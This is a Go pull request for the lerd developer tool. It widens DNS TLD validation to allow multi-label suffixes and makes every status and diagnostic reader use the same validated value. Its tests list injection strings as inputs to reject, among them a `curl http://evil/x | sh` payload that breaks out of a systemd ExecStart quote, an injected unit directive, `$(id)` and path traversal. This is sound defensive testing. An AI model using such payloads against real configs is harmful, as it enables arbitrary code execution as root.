### PR TITLE
fix(dns): DNS TLD writer/reader split

### DIFF
--- a/cmd/lerd/main.go
+++ b/cmd/lerd/main.go
@@ -344,12 +344,13 @@ func newDNSCheckCmd() *cobra.Command {
 				return err
 			}
 
+			tld := dns.ConfiguredTLD()
 			if !cfg.DNS.Enabled {
-				fmt.Printf("DNS managed externally: lerd-dns is disabled, sites use *.%s.\n", cfg.DNS.TLD)
+				fmt.Printf("DNS managed externally: lerd-dns is disabled, sites use *.%s.\n", tld)
 				return nil
 			}
 
-			diag := dns.Diagnose(cfg.DNS.TLD)
+			diag := dns.Diagnose(tld)
 			printDNSDiagnostic(os.Stdout, diag)
 			if diag.FirstFailure >= 0 {
 				os.Exit(1)

--- a/docs/configuration.md
+++ b/docs/configuration.md
@@ -54,7 +54,11 @@ dns:
                          # once at first install, then flipped with lerd dns:enable
                          # / dns:disable, never re-prompted. dns:repair re-runs the
                          # setup to fix a broken but enabled resolver.
-  tld: "test"
+  tld: "test"            # the suffix sites are served under. Dot-separated DNS
+                         # labels (letters, digits, hyphens), so "test" or
+                         # "internal.example.com". An unusable value is refused
+                         # and lerd serves .test instead, which lerd doctor
+                         # reports rather than applying silently.
   upstream:              # optional. Pins the upstream DNS servers dnsmasq
     - 192.168.100.129    # forwards non-.test queries to. Leave unset to
                          # auto-detect from the system resolver. Set this when

--- a/internal/cli/doctor.go
+++ b/internal/cli/doctor.go
@@ -365,9 +365,19 @@ func runDoctorInto(w io.Writer, useColor bool) (DoctorReport, error) {
 	fmt.Fprintln(w, "\n[DNS]")
 
 	dnsManaged := cfg == nil || cfg.DNS.Enabled
-	tld := "test"
-	if cfg != nil && cfg.DNS.TLD != "" {
-		tld = cfg.DNS.TLD
+
+	tld := dns.ConfiguredTLD()
+	rawTLD := ""
+	if cfg != nil {
+		rawTLD = cfg.DNS.TLD
+	}
+	tldRejected := rawTLD != "" && !dns.ValidTLD(rawTLD)
+
+	if tldRejected {
+		// Say so once here rather than in every rung below.
+		fail(fmt.Sprintf("DNS TLD (.%s)", rawTLD),
+			fmt.Sprintf("not a usable DNS suffix; serving .%s instead", tld),
+			"set dns.tld in "+cfgFile+" to dot-separated DNS labels (letters, digits, hyphens), e.g. test or internal.example.com")
 	}
 
 	if !dnsManaged {
@@ -375,7 +385,9 @@ func runDoctorInto(w io.Writer, useColor bool) (DoctorReport, error) {
 	} else if tld == "" {
 		fail("DNS TLD configured", "empty TLD in config", "set dns.tld in "+cfgFile)
 	} else {
-		ok(fmt.Sprintf("DNS TLD (.%s)", tld))
+		if !tldRejected {
+			ok(fmt.Sprintf("DNS TLD (.%s)", tld))
+		}
 		// Layered diagnostic: walk the chain (container, config, port,
 		// dig at 5300, resolver hookup, interface routing, system
 		// lookup) so a one-line failure points at exactly which rung

--- a/internal/cli/startstop.go
+++ b/internal/cli/startstop.go
@@ -384,12 +384,7 @@ func podmanContainerRunning(name string) bool {
 // the configured TLD, which means a listener on the DNS port is lerd-dns itself
 // rather than a foreign process.
 func lerdDNSAnswering() bool {
-	cfg, _ := config.LoadGlobal()
-	tld := "test"
-	if cfg != nil && cfg.DNS.TLD != "" {
-		tld = cfg.DNS.TLD
-	}
-	return dns.CheckStatus(tld) != dns.StatusDown
+	return dns.CheckStatus(dns.ConfiguredTLD()) != dns.StatusDown
 }
 
 func runStart(_ *cobra.Command, _ []string) error {

--- a/internal/cli/status.go
+++ b/internal/cli/status.go
@@ -70,17 +70,18 @@ func runStatus(_ *cobra.Command, _ []string) error {
 
 	// DNS check
 	fmt.Println("\n[DNS]")
+	tld := dns.ConfiguredTLD()
 	if !cfg.DNS.Enabled {
-		ok2(fmt.Sprintf("DNS managed externally (.%s)", cfg.DNS.TLD))
+		ok2(fmt.Sprintf("DNS managed externally (.%s)", tld))
 	} else {
-		switch dns.CheckStatus(cfg.DNS.TLD) {
+		switch dns.CheckStatus(tld) {
 		case dns.StatusOK:
-			ok2(fmt.Sprintf(".%s resolution", cfg.DNS.TLD))
+			ok2(fmt.Sprintf(".%s resolution", tld))
 		case dns.StatusDegraded:
-			warn2(fmt.Sprintf(".%s resolution", cfg.DNS.TLD),
+			warn2(fmt.Sprintf(".%s resolution", tld),
 				"lerd-dns healthy, system resolver bypassed (VPN?)")
 		default:
-			fail2(fmt.Sprintf(".%s resolution", cfg.DNS.TLD),
+			fail2(fmt.Sprintf(".%s resolution", tld),
 				"not resolving",
 				dnsRestartHint())
 		}

--- a/internal/dns/setup_common.go
+++ b/internal/dns/setup_common.go
@@ -303,12 +303,30 @@ func sudoWriteFile(path string, content []byte, mode os.FileMode) error {
 // unusable one.
 const DefaultTLD = "test"
 
-// tldPattern is a single DNS label: letters, digits and hyphens. Nothing else can
-// be a TLD, and nothing else may reach the callers below.
-var tldPattern = regexp.MustCompile(`^[A-Za-z0-9]([A-Za-z0-9-]{0,61}[A-Za-z0-9])?$`)
+// tldLabelPattern is a single DNS label: letters, digits and hyphens. Nothing
+// else can appear in a TLD, and nothing else may reach the callers below.
+var tldLabelPattern = regexp.MustCompile(`^[A-Za-z0-9]([A-Za-z0-9-]{0,61}[A-Za-z0-9])?$`)
+
+// maxTLDLength is the DNS limit on a fully qualified name, minus the trailing dot.
+const maxTLDLength = 253
+
+// ValidTLD reports whether tld is one or more DNS labels joined by dots. Dots are
+// allowed because every other subsystem already appends dns.tld verbatim to build
+// site domains, and a dot is inert everywhere the value lands.
+func ValidTLD(tld string) bool {
+	if tld == "" || len(tld) > maxTLDLength {
+		return false
+	}
+	for _, label := range strings.Split(tld, ".") {
+		if !tldLabelPattern.MatchString(label) {
+			return false
+		}
+	}
+	return true
+}
 
 // ConfiguredTLD returns the TLD lerd serves, and refuses to return one that is
-// not a DNS label.
+// not a usable DNS suffix.
 //
 // Everything that writes or reads a .tld route has to agree on this: the dnsmasq
 // address records, the lerd0 link, the dispatcher and the diagnostic that checks
@@ -316,10 +334,11 @@ var tldPattern = regexp.MustCompile(`^[A-Za-z0-9]([A-Za-z0-9-]{0,61}[A-Za-z0-9])
 // command of a root-owned systemd unit that lerd writes and starts through its own
 // passwordless sudo grants, so a config.yaml carrying `tld: "test'; curl evil|sh; #"`
 // would otherwise be arbitrary code as root. Anything unusable falls back to the
-// default rather than reaching a shell.
+// default rather than reaching a shell. Readers go through here too, or a rejected
+// TLD leaves them hunting for a record the writer was never going to emit.
 func ConfiguredTLD() string {
 	tld := config.EffectiveTLD()
-	if !tldPattern.MatchString(tld) {
+	if !ValidTLD(tld) {
 		return DefaultTLD
 	}
 	return tld

--- a/internal/dns/setup_common_test.go
+++ b/internal/dns/setup_common_test.go
@@ -240,7 +240,7 @@ func TestConfiguredTLD_rejectsAnythingThatIsNotADNSLabel(t *testing.T) {
 		"test", "dev", "local8", "my-tld", "x",
 		// Multi-label suffixes are usable: the rest of lerd already appends
 		// dns.tld verbatim to build site domains, vhosts and certificate SANs.
-		"lerd.test", "l.mb01.example.dev", "internal.example.com", "a.b.c.d.e",
+		"lerd.test", "lab.example.dev", "internal.example.com", "a.b.c.d.e",
 	} {
 		if !ValidTLD(good) {
 			t.Errorf("ValidTLD rejected the usable TLD %q", good)
@@ -252,7 +252,7 @@ func TestConfiguredTLD_rejectsAnythingThatIsNotADNSLabel(t *testing.T) {
 // single-label check, so the writer emitted the default while every reader looked
 // for the configured value and the diagnostic could never pass.
 func TestWriteDnsmasqConfig_honoursMultiLabelTLD(t *testing.T) {
-	writeGlobalConfig(t, "dns:\n  enabled: true\n  tld: l.mb01.example.dev\n")
+	writeGlobalConfig(t, "dns:\n  enabled: true\n  tld: lab.example.dev\n")
 
 	dir := t.TempDir()
 	if err := WriteDnsmasqConfigFor(dir, "127.0.0.1"); err != nil {
@@ -260,7 +260,7 @@ func TestWriteDnsmasqConfig_honoursMultiLabelTLD(t *testing.T) {
 	}
 	content := readGlobalFile(t, filepath.Join(dir, "lerd.conf"))
 
-	assertContains(t, content, "address=/.l.mb01.example.dev/127.0.0.1")
+	assertContains(t, content, "address=/.lab.example.dev/127.0.0.1")
 	if strings.Contains(content, "address=/.test/") {
 		t.Errorf("configured TLD was replaced by the default, got:\n%s", content)
 	}
@@ -272,7 +272,7 @@ func TestConfiguredTLD_writerEmitsWhatTheDiagnosticLooksFor(t *testing.T) {
 	for _, tld := range []string{
 		"test",
 		"lerd.test",
-		"l.mb01.example.dev",
+		"lab.example.dev",
 		`bad'; curl http://evil/x | sh; #`, // rejected, so both sides must see the default
 		"a..b",                             // rejected for an empty label
 	} {

--- a/internal/dns/setup_common_test.go
+++ b/internal/dns/setup_common_test.go
@@ -3,6 +3,7 @@ package dns
 import (
 	"os"
 	"path/filepath"
+	"strconv"
 	"strings"
 	"testing"
 )
@@ -215,4 +216,105 @@ func TestConfiguredUpstreamDNS_emptyWhenUnset(t *testing.T) {
 	if got := configuredUpstreamDNS(); len(got) != 0 {
 		t.Errorf("expected no upstreams, got %v", got)
 	}
+}
+
+// The TLD is interpolated into the shell command of a root-owned systemd unit
+// that lerd writes and starts through its own passwordless sudo grants, so a
+// config.yaml carrying a crafted dns.tld would be arbitrary code as root. Nothing
+// that is not a DNS label may reach ConfiguredTLD's callers.
+func TestConfiguredTLD_rejectsAnythingThatIsNotADNSLabel(t *testing.T) {
+	for _, bad := range []string{
+		`test'; curl http://evil/x | sh; #`, // closes the ExecStart quote
+		"test\nExecStart=/bin/sh -c 'id'",   // injects a second unit directive
+		"$(id)", "`id`", "te st", "-lead", "trail-", "", "../../etc",
+		// Dots are allowed between labels, but never as a way to smuggle an
+		// empty, traversing or otherwise non-label segment past the check.
+		".", "..", "a..b", ".lead", "trail.", "a.-b", "a.b-", "a./b", "a.b/c",
+		"a.b c", "a.$(id)", "a.b\nExtra", strings.Repeat("a.", 127) + "toolong",
+	} {
+		if ValidTLD(bad) {
+			t.Errorf("ValidTLD accepted %q, which would reach a root shell", bad)
+		}
+	}
+	for _, good := range []string{
+		"test", "dev", "local8", "my-tld", "x",
+		// Multi-label suffixes are usable: the rest of lerd already appends
+		// dns.tld verbatim to build site domains, vhosts and certificate SANs.
+		"lerd.test", "l.mb01.example.dev", "internal.example.com", "a.b.c.d.e",
+	} {
+		if !ValidTLD(good) {
+			t.Errorf("ValidTLD rejected the usable TLD %q", good)
+		}
+	}
+}
+
+// The bug behind #1544's DNS sidenote: a multi-label dns.tld was rejected by the
+// single-label check, so the writer emitted the default while every reader looked
+// for the configured value and the diagnostic could never pass.
+func TestWriteDnsmasqConfig_honoursMultiLabelTLD(t *testing.T) {
+	writeGlobalConfig(t, "dns:\n  enabled: true\n  tld: l.mb01.example.dev\n")
+
+	dir := t.TempDir()
+	if err := WriteDnsmasqConfigFor(dir, "127.0.0.1"); err != nil {
+		t.Fatalf("WriteDnsmasqConfigFor: %v", err)
+	}
+	content := readGlobalFile(t, filepath.Join(dir, "lerd.conf"))
+
+	assertContains(t, content, "address=/.l.mb01.example.dev/127.0.0.1")
+	if strings.Contains(content, "address=/.test/") {
+		t.Errorf("configured TLD was replaced by the default, got:\n%s", content)
+	}
+}
+
+// Writer and reader must derive the suffix from the same place: defaultDnsmasqConfigOK
+// looks for exactly this string, so a config the writer produced has to satisfy it.
+func TestConfiguredTLD_writerEmitsWhatTheDiagnosticLooksFor(t *testing.T) {
+	for _, tld := range []string{
+		"test",
+		"lerd.test",
+		"l.mb01.example.dev",
+		`bad'; curl http://evil/x | sh; #`, // rejected, so both sides must see the default
+		"a..b",                             // rejected for an empty label
+	} {
+		t.Run(tld, func(t *testing.T) {
+			writeGlobalConfig(t, "dns:\n  enabled: true\n  tld: "+strconv.Quote(tld)+"\n")
+
+			dir := t.TempDir()
+			if err := WriteDnsmasqConfigFor(dir, "127.0.0.1"); err != nil {
+				t.Fatalf("WriteDnsmasqConfigFor: %v", err)
+			}
+			content := readGlobalFile(t, filepath.Join(dir, "lerd.conf"))
+
+			want := "address=/." + ConfiguredTLD() + "/"
+			if !strings.Contains(content, want) {
+				t.Errorf("diagnostic looks for %q, writer produced:\n%s", want, content)
+			}
+		})
+	}
+}
+
+// A rejected TLD falls back rather than reaching the dnsmasq config at all.
+func TestConfiguredTLD_rejectedSuffixNeverReachesTheConfig(t *testing.T) {
+	writeGlobalConfig(t, "dns:\n  enabled: true\n  tld: \"bad'; curl http://evil/x | sh; #\"\n")
+
+	dir := t.TempDir()
+	if err := WriteDnsmasqConfigFor(dir, "127.0.0.1"); err != nil {
+		t.Fatalf("WriteDnsmasqConfigFor: %v", err)
+	}
+	content := readGlobalFile(t, filepath.Join(dir, "lerd.conf"))
+
+	if strings.Contains(content, "evil") || strings.Contains(content, "curl") {
+		t.Errorf("payload reached the dnsmasq config:\n%s", content)
+	}
+	assertContains(t, content, "address=/."+DefaultTLD+"/")
+}
+
+// readGlobalFile mirrors readFile from setup_test.go, which is linux-only.
+func readGlobalFile(t *testing.T, path string) string {
+	t.Helper()
+	b, err := os.ReadFile(path)
+	if err != nil {
+		t.Fatalf("reading %s: %v", path, err)
+	}
+	return string(b)
 }

--- a/internal/dns/setup_darwin_test.go
+++ b/internal/dns/setup_darwin_test.go
@@ -108,7 +108,7 @@ func TestDarwinResolver_routesTheTLDThroughTheValidator(t *testing.T) {
 func TestDarwinSudoers_tldCannotEscapeTheResolverDir(t *testing.T) {
 	for _, bad := range []string{"../../etc/cron.d/x", "a/b", "x\nEXTRA"} {
 		tld := DefaultTLD
-		if tldPattern.MatchString(bad) {
+		if ValidTLD(bad) {
 			tld = bad
 		}
 		rules := ruleLines(renderDarwinSudoers("alice", tld))

--- a/internal/dns/setup_test.go
+++ b/internal/dns/setup_test.go
@@ -753,27 +753,6 @@ func TestDummyLinkGrantsLive_runsAGrantedCommandRatherThanAskingSudoL(t *testing
 	assertContains(t, probe, `"sudo", "-n"`)
 }
 
-// The TLD is interpolated into the shell command of a root-owned systemd unit
-// that lerd writes and starts through its own passwordless sudo grants, so a
-// config.yaml carrying a crafted dns.tld would be arbitrary code as root. Nothing
-// that is not a DNS label may reach ConfiguredTLD's callers.
-func TestConfiguredTLD_rejectsAnythingThatIsNotADNSLabel(t *testing.T) {
-	for _, bad := range []string{
-		`test'; curl http://evil/x | sh; #`, // closes the ExecStart quote
-		"test\nExecStart=/bin/sh -c 'id'",   // injects a second unit directive
-		"$(id)", "`id`", "te st", "-lead", "trail-", "", "../../etc",
-	} {
-		if tldPattern.MatchString(bad) {
-			t.Errorf("tldPattern accepted %q, which would reach a root shell", bad)
-		}
-	}
-	for _, good := range []string{"test", "dev", "local8", "my-tld", "x"} {
-		if !tldPattern.MatchString(good) {
-			t.Errorf("tldPattern rejected the usable TLD %q", good)
-		}
-	}
-}
-
 // Belt and braces: a TLD that passes the pattern lands in the unit as an inert
 // word and cannot terminate the quoting around ExecStart's shell command.
 func TestLerdLinkUnit_tldLandsInertInTheUnit(t *testing.T) {

--- a/internal/mcp/dns_diagnose.go
+++ b/internal/mcp/dns_diagnose.go
@@ -1,16 +1,13 @@
 package mcp
 
 import (
-	"github.com/geodro/lerd/internal/config"
 	"github.com/geodro/lerd/internal/dns"
 )
 
 func execDNSDiagnose(args map[string]any) (any, *rpcError) {
 	tld := strArg(args, "tld")
 	if tld == "" {
-		if cfg, _ := config.LoadGlobal(); cfg != nil {
-			tld = cfg.DNS.TLD
-		}
+		tld = dns.ConfiguredTLD()
 	}
 	return toolJSON(dns.Diagnose(tld)), nil
 }

--- a/internal/tui/system.go
+++ b/internal/tui/system.go
@@ -57,12 +57,9 @@ func (m *Model) systemRows() []systemRow {
 
 	// DNS
 	header("DNS")
-	tld := "test"
+	tld := dns.ConfiguredTLD()
 	dnsEnabled := true
 	if cfg != nil {
-		if cfg.DNS.TLD != "" {
-			tld = cfg.DNS.TLD
-		}
 		dnsEnabled = cfg.DNS.Enabled
 	}
 	info("TLD", tld)

--- a/internal/tui/system_test.go
+++ b/internal/tui/system_test.go
@@ -1,9 +1,13 @@
 package tui
 
 import (
+	"os"
+	"path/filepath"
 	"runtime"
 	"strings"
 	"testing"
+
+	"github.com/geodro/lerd/internal/dns"
 )
 
 // TestSystemRows_ContainsCoreSections checks every section header the system
@@ -127,4 +131,31 @@ func TestSystemRows_DumpsInfoShowsBufferedCount(t *testing.T) {
 	if !strings.Contains(bufferedRow.value, "2 events") {
 		t.Errorf("expected 'Buffered: 2 events', got %q", bufferedRow.value)
 	}
+}
+
+// The TUI must name the suffix the dnsmasq config was written from. Showing the
+// raw dns.tld left the pane claiming a TLD nothing serves, and probing it left
+// the status permanently down (#1559).
+func TestSystemRows_ShowsTheServedTLD(t *testing.T) {
+	cfgHome := t.TempDir()
+	t.Setenv("XDG_CONFIG_HOME", cfgHome)
+	t.Setenv("XDG_DATA_HOME", t.TempDir())
+	dir := filepath.Join(cfgHome, "lerd")
+	if err := os.MkdirAll(dir, 0o755); err != nil {
+		t.Fatal(err)
+	}
+	body := "dns:\n  enabled: false\n  tld: \"bad'; curl http://evil/x | sh; #\"\n"
+	if err := os.WriteFile(filepath.Join(dir, "config.yaml"), []byte(body), 0o644); err != nil {
+		t.Fatal(err)
+	}
+
+	for _, r := range NewModel("test").systemRows() {
+		if r.kind == sysInfo && r.label == "TLD" {
+			if r.value != dns.DefaultTLD {
+				t.Errorf("TLD row shows %q, but the writer serves %q", r.value, dns.DefaultTLD)
+			}
+			return
+		}
+	}
+	t.Fatal("no TLD row in the system pane")
 }

--- a/internal/ui/dns_status_watcher.go
+++ b/internal/ui/dns_status_watcher.go
@@ -5,7 +5,6 @@ import (
 	"sync/atomic"
 	"time"
 
-	"github.com/geodro/lerd/internal/config"
 	"github.com/geodro/lerd/internal/dns"
 	"github.com/geodro/lerd/internal/eventbus"
 )
@@ -47,13 +46,9 @@ type dnsStatusDeps struct {
 // defaultDNSStatusDeps wires the production resolver and bus.
 func defaultDNSStatusDeps() dnsStatusDeps {
 	return dnsStatusDeps{
-		tld: func() string {
-			cfg, _ := config.LoadGlobal()
-			if cfg == nil {
-				return "test"
-			}
-			return cfg.DNS.TLD
-		},
+		// The same function the dnsmasq config was written from: a refused
+		// tld leaves this probing a suffix nothing ever served.
+		tld:     dns.ConfiguredTLD,
 		check:   dns.CheckStatus,
 		visible: func() bool { return visibleClients.Load() > 0 },
 		publish: func() { eventbus.Default.Publish(eventbus.KindStatus) },

--- a/internal/ui/dns_status_watcher_test.go
+++ b/internal/ui/dns_status_watcher_test.go
@@ -1,6 +1,8 @@
 package ui
 
 import (
+	"os"
+	"path/filepath"
 	"testing"
 
 	"github.com/geodro/lerd/internal/dns"
@@ -218,5 +220,26 @@ func TestTickDNSStatusTLDFromConfig(t *testing.T) {
 	tickDNSStatus(deps)
 	if seen != "lerd" {
 		t.Fatalf("check called with tld=%q, want %q", seen, "lerd")
+	}
+}
+
+// The watcher must probe the suffix the dnsmasq config was written from, not the
+// raw config value. A dns.tld the writer refused leaves the dashboard reporting
+// DNS down forever while the CLI reports it working (#1559).
+func TestDefaultDNSStatusDeps_ProbesTheServedTLD(t *testing.T) {
+	cfgHome := t.TempDir()
+	t.Setenv("XDG_CONFIG_HOME", cfgHome)
+	t.Setenv("XDG_DATA_HOME", t.TempDir())
+	dir := filepath.Join(cfgHome, "lerd")
+	if err := os.MkdirAll(dir, 0o755); err != nil {
+		t.Fatal(err)
+	}
+	body := "dns:\n  enabled: true\n  tld: \"bad'; curl http://evil/x | sh; #\"\n"
+	if err := os.WriteFile(filepath.Join(dir, "config.yaml"), []byte(body), 0o644); err != nil {
+		t.Fatal(err)
+	}
+
+	if got := defaultDNSStatusDeps().tld(); got != dns.DefaultTLD {
+		t.Errorf("watcher probes %q, but the writer serves %q", got, dns.DefaultTLD)
 	}
 }

--- a/internal/ui/dns_tld_reader_test.go
+++ b/internal/ui/dns_tld_reader_test.go
@@ -1,0 +1,47 @@
+package ui
+
+import (
+	"os"
+	"path/filepath"
+	"testing"
+
+	"github.com/geodro/lerd/internal/dns"
+)
+
+// writeDNSConfig points the config loader at a temp tree holding the given
+// dns.tld, so a reader can be checked against a value the writer refuses.
+func writeDNSConfig(t *testing.T, tld string) {
+	t.Helper()
+	cfgHome := t.TempDir()
+	t.Setenv("XDG_CONFIG_HOME", cfgHome)
+	t.Setenv("XDG_DATA_HOME", t.TempDir())
+	dir := filepath.Join(cfgHome, "lerd")
+	if err := os.MkdirAll(dir, 0o755); err != nil {
+		t.Fatal(err)
+	}
+	body := "dns:\n  enabled: true\n  tld: " + tld + "\n"
+	if err := os.WriteFile(filepath.Join(dir, "config.yaml"), []byte(body), 0o644); err != nil {
+		t.Fatal(err)
+	}
+}
+
+// The status snapshot the dashboard and the tray render has to name the suffix
+// the dnsmasq config was written from. Reporting the raw value left the pill
+// red forever on a config the writer had refused (#1559).
+func TestBuildStatus_ReportsTheServedTLD(t *testing.T) {
+	writeDNSConfig(t, `"bad'; curl http://evil/x | sh; #"`)
+
+	if got := buildStatus().DNS.TLD; got != dns.DefaultTLD {
+		t.Errorf("status reports tld %q, but the writer serves %q", got, dns.DefaultTLD)
+	}
+}
+
+// A multi-label suffix is served as written, so the status must carry it rather
+// than falling back.
+func TestBuildStatus_KeepsAMultiLabelTLD(t *testing.T) {
+	writeDNSConfig(t, "internal.example.com")
+
+	if got := buildStatus().DNS.TLD; got != "internal.example.com" {
+		t.Errorf("status reports tld %q, want internal.example.com", got)
+	}
+}

--- a/internal/ui/server.go
+++ b/internal/ui/server.go
@@ -690,10 +690,9 @@ func handleStatus(w http.ResponseWriter, _ *http.Request) {
 
 func buildStatus() StatusResponse {
 	cfg, _ := config.LoadGlobal()
-	tld := "test"
+	tld := dns.ConfiguredTLD()
 	dnsEnabled := true
 	if cfg != nil {
-		tld = cfg.DNS.TLD
 		dnsEnabled = cfg.DNS.Enabled
 	}
 


### PR DESCRIPTION
Refs: https://github.com/lerd-env/lerd/issues/1559

A `dns.tld` holding more than one label was refused by ConfiguredTLD and replaced with the default, so the generated dnsmasq config carried `.test` while doctor and `dns:check` looked for the suffix the config named. Nothing reconciled the two. install, start and dns:repair all rewrite the file with the same default, so the failing rung stayed failing and its hint pointed at a command that could not help.

The validation now walks each dot separated label instead of requiring a single one, so a suffix like `internal.example.com` is served as written. Allowing a dot does not widen what reaches a shell. A label is still letters, digits and hyphens, so no whitespace, quote, semicolon, backtick, dollar sign, newline or slash survives, and a dot is inert in every position the value lands in: the `/etc/resolver` filename, the sudoers target, the dnsmasq address record and the unquoted `~@TLD@` argument in the NetworkManager dispatcher script.

Supporting multi-label suffixes rather than rejecting them matches what the rest of lerd already does, since site domains, vhost server names and certificate SANs all append dns.tld verbatim. Only this package required one label, which left such a config honoured everywhere except the DNS it needed.

The readers now derive the suffix from ConfiguredTLD as well, in doctor, dns:check, status, the start probe and the MCP diagnose tool. Reading cfg.DNS.TLD raw is what let the writer and the checks disagree in the first place, and going through one function means a refused value can no longer leave them hunting for a record that was never going to be written.

A suffix that is still unusable is now reported rather than applied in silence. doctor names the value it refused and the one it is serving instead, so the substitution is visible at the point it happens.